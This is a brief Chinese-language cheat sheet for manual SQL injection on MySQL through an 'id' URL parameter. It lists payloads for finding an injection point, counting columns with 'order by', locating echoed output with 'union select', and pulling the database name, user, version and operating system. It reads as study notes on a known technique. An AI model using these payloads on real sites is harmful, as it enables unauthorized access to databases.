判断是否有注入点
- ?id=1 and 1=2
- ?id=1'
判断字段数
- ?id=1 and 1=1 order by x
判断回显点
- ?id=1 and 1=2 union select 1,2,...,x
数据库信息收集(mysql基础参考)
- 联合查询(?id=1 and 1=2 union select 1,database())
- database()返回当前网站所使用的数据库名字
- user()返回执行当前查询的用户名
- version()获取当前数据库版本
- @@version_compile_os获取当前操作系统